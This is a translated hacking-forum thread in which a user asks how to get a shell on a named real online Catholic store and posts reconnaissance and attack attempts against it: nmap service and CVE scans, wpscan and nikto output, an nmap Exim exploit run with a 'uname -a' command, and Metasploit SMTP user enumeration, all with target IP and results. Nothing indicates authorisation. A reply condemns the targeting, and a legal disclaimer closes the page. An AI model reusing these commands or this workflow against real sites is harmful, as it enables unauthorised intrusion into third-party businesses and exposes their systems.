Penetration Tests: Catholic Store Available - How Do I Shell It.

cewl

Senior Member
3 Jun 2017
Merdekan
Within half an hour I will write all the information and vulnerabilities here.

Some information: vulnerabilities, ports and so on, nmap output.

Code:
   nmap -sV --script freevulnsearch avemariarosaries.com
Code:
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-18 15:55 EDT
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 1.20% done; ETC: 15:58 (0:02:45 remaining)
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 9.00% done; ETC: 15:55 (0:00:30 remaining)
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 14.55% done; ETC: 15:55 (0:00:23 remaining)
Stats: 0:00:05 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 20.80% done; ETC: 15:55 (0:00:15 remaining)
Stats: 0:00:42 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 92.31% done; ETC: 15:56 (0:00:01 remaining)
Nmap scan report for avemariarosaries.com (144.208.79.223)
Host is up (0.29s latency).
rDNS record for 144.208.79.223: ecbiz224.inmotionhosting.com
Not shown: 957 filtered ports, 30 closed ports
PORT     STATE SERVICE    VERSION
21/tcp   open  ftp        Pure-FTPd
25/tcp   open  smtp       Exim smtpd 4.92
| freevulnsearch: 
|   CVE-2019-13917    Critical    10.0        https://cve.circl.lu/cve/CVE-2019-13917
|_  *CVE found with NMAP-CPE: (cpe:/a:exim:exim:4.92)
80/tcp   open  http       Apache httpd (PHP 7.2.19)
|_http-server-header: Apache
110/tcp  open  pop3       Dovecot pop3d
143/tcp  open  imap       Dovecot imapd
443/tcp  open  ssl/ssl    Apache httpd (SSL-only mode)
|_http-server-header: Apache
465/tcp  open  ssl/smtp   Exim smtpd 4.92
| freevulnsearch: 
|   CVE-2019-13917    Critical    10.0        https://cve.circl.lu/cve/CVE-2019-13917
|_  *CVE found with NMAP-CPE: (cpe:/a:exim:exim:4.92)
587/tcp  open  smtp       Exim smtpd 4.92
| freevulnsearch: 
|   CVE-2019-13917    Critical    10.0        https://cve.circl.lu/cve/CVE-2019-13917
|_  *CVE found with NMAP-CPE: (cpe:/a:exim:exim:4.92)
993/tcp  open  ssl/imaps?
995/tcp  open  ssl/pop3s?
2222/tcp open  ssh        OpenSSH 7.4 (protocol 2.0)
| freevulnsearch: 
|   CVE-2018-15919    Medium        5.0        https://cve.circl.lu/cve/CVE-2018-15919
|   CVE-2017-15906    Medium        5.0        https://cve.circl.lu/cve/CVE-2017-15906
|_  *CVE found with NMAP-CPE: (cpe:/a:openbsd:openssh:7.4)
3306/tcp open  mysql      MySQL 5.5.5-10.2.25-MariaDB-log
| freevulnsearch: 
|   CVE-2014-6520    Medium        4.0        https://cve.circl.lu/cve/CVE-2014-6520
|   CVE-2014-4260    Medium        5.5        https://cve.circl.lu/cve/CVE-2014-4260
|   CVE-2014-4258    Medium        6.5        https://cve.circl.lu/cve/CVE-2014-4258
|   CVE-2014-4243    Low        2.8        https://cve.circl.lu/cve/CVE-2014-4243
|   CVE-2014-2440    Medium        5.1        https://cve.circl.lu/cve/CVE-2014-2440
|   CVE-2014-2438    Low        3.5        https://cve.circl.lu/cve/CVE-2014-2438
|   CVE-2014-2436    Medium        6.0        https://cve.circl.lu/cve/CVE-2014-2436
|   CVE-2014-2432    Low        2.8        https://cve.circl.lu/cve/CVE-2014-2432
|   CVE-2014-2431    Low        2.6        https://cve.circl.lu/cve/CVE-2014-2431
|   CVE-2014-2430    Low        3.5        https://cve.circl.lu/cve/CVE-2014-2430
|   CVE-2014-2419    Medium        4.0        https://cve.circl.lu/cve/CVE-2014-2419
|   CVE-2014-0437    Low        3.5        https://cve.circl.lu/cve/CVE-2014-0437
|   CVE-2014-0420    Low        2.8        https://cve.circl.lu/cve/CVE-2014-0420
|   CVE-2014-0412    Medium        4.0        https://cve.circl.lu/cve/CVE-2014-0412
|   CVE-2014-0402    Medium        4.0        https://cve.circl.lu/cve/CVE-2014-0402
|   CVE-2014-0401    Medium        4.0        https://cve.circl.lu/cve/CVE-2014-0401
|   CVE-2014-0393    Low        3.3        https://cve.circl.lu/cve/CVE-2014-0393
|   CVE-2014-0386    Medium        4.0        https://cve.circl.lu/cve/CVE-2014-0386
|   CVE-2014-0384    Medium        4.0        https://cve.circl.lu/cve/CVE-2014-0384
|   CVE-2014-0001    High        7.5        https://cve.circl.lu/cve/CVE-2014-0001
|   CVE-2013-5908    Low        2.6        https://cve.circl.lu/cve/CVE-2013-5908
|   CVE-2013-5891    Medium        4.0        https://cve.circl.lu/cve/CVE-2013-5891
|   CVE-2013-3812    Low        3.5        https://cve.circl.lu/cve/CVE-2013-3812
|   CVE-2013-3809    Medium        4.0        https://cve.circl.lu/cve/CVE-2013-3809
|   CVE-2013-3808    Medium        4.0        https://cve.circl.lu/cve/CVE-2013-3808
|   CVE-2013-3805    Medium        4.0        https://cve.circl.lu/cve/CVE-2013-3805
|   CVE-2013-3804    Medium        4.0        https://cve.circl.lu/cve/CVE-2013-3804
|   CVE-2013-3802    Medium        4.0        https://cve.circl.lu/cve/CVE-2013-3802
|   CVE-2013-3801    Medium        5.0        https://cve.circl.lu/cve/CVE-2013-3801
|   CVE-2013-3794    Medium        4.0        https://cve.circl.lu/cve/CVE-2013-3794
|   CVE-2013-3793    Medium        4.0        https://cve.circl.lu/cve/CVE-2013-3793
|   CVE-2013-3783    Medium        4.0        https://cve.circl.lu/cve/CVE-2013-3783
|   CVE-2013-2392    Medium        4.0        https://cve.circl.lu/cve/CVE-2013-2392
|   CVE-2013-2391    Low        3.0        https://cve.circl.lu/cve/CVE-2013-2391
|   CVE-2013-2389    Medium        4.0        https://cve.circl.lu/cve/CVE-2013-2389
|   CVE-2013-2378    Medium        6.0        https://cve.circl.lu/cve/CVE-2013-2378
|   CVE-2013-2376    Medium        4.0        https://cve.circl.lu/cve/CVE-2013-2376
|   CVE-2013-1555    Medium        4.0        https://cve.circl.lu/cve/CVE-2013-1555
|   CVE-2013-1552    Medium        6.0        https://cve.circl.lu/cve/CVE-2013-1552
|   CVE-2013-1523    Medium        4.6        https://cve.circl.lu/cve/CVE-2013-1523
|   CVE-2013-1521    Medium        6.5        https://cve.circl.lu/cve/CVE-2013-1521
|   CVE-2013-1512    Medium        4.0        https://cve.circl.lu/cve/CVE-2013-1512
|   CVE-2013-1511    Low        3.5        https://cve.circl.lu/cve/CVE-2013-1511
|   CVE-2013-1506    Low        2.8        https://cve.circl.lu/cve/CVE-2013-1506
|   CVE-2013-1502    Low        1.5        https://cve.circl.lu/cve/CVE-2013-1502
|   CVE-2013-1492    High        7.5        https://cve.circl.lu/cve/CVE-2013-1492
|   CVE-2013-0389    Medium        6.8        https://cve.circl.lu/cve/CVE-2013-0389
|   CVE-2013-0386    Medium        6.8        https://cve.circl.lu/cve/CVE-2013-0386
|   CVE-2013-0385    Medium        6.6        https://cve.circl.lu/cve/CVE-2013-0385
|   CVE-2013-0384    Medium        6.8        https://cve.circl.lu/cve/CVE-2013-0384
|   CVE-2013-0383    Medium        4.3        https://cve.circl.lu/cve/CVE-2013-0383
|   CVE-2013-0371    Medium        4.0        https://cve.circl.lu/cve/CVE-2013-0371
|   CVE-2013-0368    Medium        4.0        https://cve.circl.lu/cve/CVE-2013-0368
|   CVE-2013-0367    Medium        4.0        https://cve.circl.lu/cve/CVE-2013-0367
|   CVE-2012-5096    Low        3.5        https://cve.circl.lu/cve/CVE-2012-5096
|   CVE-2012-5060    Medium        6.8        https://cve.circl.lu/cve/CVE-2012-5060
|   CVE-2012-3197    Low        3.5        https://cve.circl.lu/cve/CVE-2012-3197
|   CVE-2012-3180    Medium        4.0        https://cve.circl.lu/cve/CVE-2012-3180
|   CVE-2012-3177    Medium        6.8        https://cve.circl.lu/cve/CVE-2012-3177
|   CVE-2012-3173    Medium        4.0        https://cve.circl.lu/cve/CVE-2012-3173
|   CVE-2012-3166    Medium        4.0        https://cve.circl.lu/cve/CVE-2012-3166
|   CVE-2012-3163    Critical    9.0        https://cve.circl.lu/cve/CVE-2012-3163
|   CVE-2012-3160    Low        2.1        https://cve.circl.lu/cve/CVE-2012-3160
|   CVE-2012-3158    High        7.5        https://cve.circl.lu/cve/CVE-2012-3158
|   CVE-2012-3156    Low        3.5        https://cve.circl.lu/cve/CVE-2012-3156
|   CVE-2012-3150    Medium        4.0        https://cve.circl.lu/cve/CVE-2012-3150
|   CVE-2012-3149    Low        3.5        https://cve.circl.lu/cve/CVE-2012-3149
|   CVE-2012-3147    Medium        6.4        https://cve.circl.lu/cve/CVE-2012-3147
|   CVE-2012-3144    Medium        4.0        https://cve.circl.lu/cve/CVE-2012-3144
|   CVE-2012-2750    Critical    10.0        https://cve.circl.lu/cve/CVE-2012-2750
|   CVE-2012-2749    Medium        4.0        https://cve.circl.lu/cve/CVE-2012-2749
|   CVE-2012-2102    Low        3.5        https://cve.circl.lu/cve/CVE-2012-2102
|   CVE-2012-1757    Medium        4.0        https://cve.circl.lu/cve/CVE-2012-1757
|   CVE-2012-1735    Medium        6.8        https://cve.circl.lu/cve/CVE-2012-1735
|   CVE-2012-1734    Medium        4.0        https://cve.circl.lu/cve/CVE-2012-1734
|   CVE-2012-1705    Medium        4.0        https://cve.circl.lu/cve/CVE-2012-1705
|   CVE-2012-1703    Medium        6.8        https://cve.circl.lu/cve/CVE-2012-1703
|   CVE-2012-1702    Medium        5.0        https://cve.circl.lu/cve/CVE-2012-1702
|   CVE-2012-1697    Medium        4.0        https://cve.circl.lu/cve/CVE-2012-1697
|   CVE-2012-1696    Medium        4.0        https://cve.circl.lu/cve/CVE-2012-1696
|   CVE-2012-1690    Medium        4.0        https://cve.circl.lu/cve/CVE-2012-1690
|   CVE-2012-1689    Medium        4.0        https://cve.circl.lu/cve/CVE-2012-1689
|   CVE-2012-1688    Medium        4.0        https://cve.circl.lu/cve/CVE-2012-1688
|   CVE-2012-0882    High        7.5        https://cve.circl.lu/cve/CVE-2012-0882
|   CVE-2012-0583    Medium        4.0        https://cve.circl.lu/cve/CVE-2012-0583
|   CVE-2012-0578    Medium        4.0        https://cve.circl.lu/cve/CVE-2012-0578
|   CVE-2012-0574    Medium        4.0        https://cve.circl.lu/cve/CVE-2012-0574
|   CVE-2012-0572    Medium        4.0        https://cve.circl.lu/cve/CVE-2012-0572
|   CVE-2012-0553    High        7.5        https://cve.circl.lu/cve/CVE-2012-0553
|   CVE-2012-0540    Medium        4.0        https://cve.circl.lu/cve/CVE-2012-0540
|   CVE-2011-2262    Medium        5.0        https://cve.circl.lu/cve/CVE-2011-2262
|   CVE-2010-3839    Medium        4.0        https://cve.circl.lu/cve/CVE-2010-3839
|   CVE-2010-3838    Medium        4.0        https://cve.circl.lu/cve/CVE-2010-3838
|   CVE-2010-3837    Medium        4.0        https://cve.circl.lu/cve/CVE-2010-3837
|   CVE-2010-3836    Medium        4.0        https://cve.circl.lu/cve/CVE-2010-3836
|   CVE-2010-3835    Medium        4.0        https://cve.circl.lu/cve/CVE-2010-3835
|   CVE-2010-3834    Medium        4.0        https://cve.circl.lu/cve/CVE-2010-3834
|   CVE-2010-3833    Medium        5.0        https://cve.circl.lu/cve/CVE-2010-3833
|   *No CVE found with NMAP-CPE: (cpe:/a:mysql:mysql:5.5.5-10.2.25-mariadb-log)
|_  *CVE found with freevulnsearch function: (cpe:/a:mysql:mysql:5.5.5)
5432/tcp open  postgresql PostgreSQL DB 9.6.4 - 9.6.6
| freevulnsearch: 
|   CVE-2019-9193    Critical    9.0        https://cve.circl.lu/cve/CVE-2019-9193
|   CVE-2019-10130    Medium        4.0        https://cve.circl.lu/cve/CVE-2019-10130
|   CVE-2018-16850    High        7.5        https://cve.circl.lu/cve/CVE-2018-16850
|   CVE-2018-1115    Medium        6.4        https://cve.circl.lu/cve/CVE-2018-1115
|   CVE-2018-10925    Medium        5.5        https://cve.circl.lu/cve/CVE-2018-10925
|   CVE-2018-10915    Medium        6.0        https://cve.circl.lu/cve/CVE-2018-10915
|   CVE-2018-1058    Medium        6.5        https://cve.circl.lu/cve/CVE-2018-1058
|   CVE-2018-1053    Low        3.3        https://cve.circl.lu/cve/CVE-2018-1053
|   CVE-2017-7548    Medium        4.0        https://cve.circl.lu/cve/CVE-2017-7548
|   CVE-2017-7547    Medium        4.0        https://cve.circl.lu/cve/CVE-2017-7547
|   CVE-2017-7546    High        7.5        https://cve.circl.lu/cve/CVE-2017-7546
|   CVE-2017-7486    Medium        5.0        https://cve.circl.lu/cve/CVE-2017-7486
|   CVE-2017-7485    Medium        4.3        https://cve.circl.lu/cve/CVE-2017-7485
|   CVE-2017-7484    Medium        5.0        https://cve.circl.lu/cve/CVE-2017-7484
|   CVE-2017-15099    Medium        4.0        https://cve.circl.lu/cve/CVE-2017-15099
|   CVE-2017-15098    Medium        5.5        https://cve.circl.lu/cve/CVE-2017-15098
|   CVE-2017-12172    High        7.2        https://cve.circl.lu/cve/CVE-2017-12172
|_  *CVE found with NMAP-CPE: (cpe:/a:postgresql:postgresql:9.6)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.35 seconds

wpscan information

Code:
[+] URL: http://www.avemariarosaries.com/
[+] Started: Sun Aug 18 15:57:41 2019

Interesting Finding(s):

[+] http://www.avemariarosaries.com/robots.txt
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

nikto scan and its output

Code:
+ Server: Apache
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.3.29
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /images/: Directory indexing found.
+ Entry '/images/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /store_images/: Directory indexing found.
+ Entry '/store_images/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 3 entries which should be manually viewed.

Open ports, dmitry query

Code:
Port        State

21/tcp      open
25/tcp      open
80/tcp      open
110/tcp     open
143/tcp     open

Vulnerability research on port 25; the nmap check is as below.

Code:
    nmap --script=smtp-vuln-cve2010-4344 --script-args="smtp-vuln-cve2010-4344.exploit" -pT:25,465,587 www.avemariarosaries.com
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-18 16:29 EDT
Nmap scan report for www.avemariarosaries.com (144.208.79.223)
Host is up (0.23s latency).
rDNS record for 144.208.79.223: ecbiz224.inmotionhosting.com

PORT    STATE SERVICE
25/tcp  open  smtp
| smtp-vuln-cve2010-4344: 
|_  The SMTP server is not Exim: NOT VULNERABLE
465/tcp open  smtps
| smtp-vuln-cve2010-4344: 
|_  The SMTP server is not Exim: NOT VULNERABLE
587/tcp open  submission
| smtp-vuln-cve2010-4344: 
|_  The SMTP server is not Exim: NOT VULNERABLE

And the result of trying the other parameter is as below.

Code:
 nmap --script=smtp-vuln-cve2010-4344 --script-args="exploit.cmd='uname -a'" -pT:25,465,587 www.avemariarosaries.com
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-18 16:31 EDT
Nmap scan report for www.avemariarosaries.com (144.208.79.223)
Host is up (0.22s latency).
rDNS record for 144.208.79.223: ecbiz224.inmotionhosting.com

PORT    STATE SERVICE
25/tcp  open  smtp
| smtp-vuln-cve2010-4344: 
|_  The SMTP server is not Exim: NOT VULNERABLE
465/tcp open  smtps
| smtp-vuln-cve2010-4344: 
|_  The SMTP server is not Exim: NOT VULNERABLE
587/tcp open  submission
| smtp-vuln-cve2010-4344: 
|_  The SMTP server is not Exim: NOT VULNERABLE


From Metasploit, the penetration operations on port 25 are done according to the word txt, with the parameters below.

Code:
use auxiliary/scanner/smtp/smtp_enum
set RHOSTS http://www.avemariarosaries.com/
set USER_FILE  /root/Desktop.wordlistsifreihtimali.txt
run

Edited by a moderator:

LucadroN

Member
21 Aug 2017
And then people ask why Muslims are not liked; this is exactly why. What business do you have with people's Catholic store, why don't you respect their religious views? Nobody should expect respect.
 

The Turkhackteam.org website is in the position of a "Hosting Provider" under Article 2, paragraph 1, subparagraph (m) of Law No. 5651 and Article 5 of the same law. Content is created entirely by users without prior approval. As a hosting provider, Turkhackteam.org is not obliged to check or investigate content created by users or unlawful posts. Türkhackteam attack teams do not engage in any harmful activity against Turkish sites. Türkhackteam is not responsible for individual hacking activities carried out by Türkhackteam members. If hacking activity is carried out against your sites using the Türkhackteam name, identify the IP address that carried out this activity from the site and server access logs and file a criminal complaint with the public prosecutor's office together with the other evidence.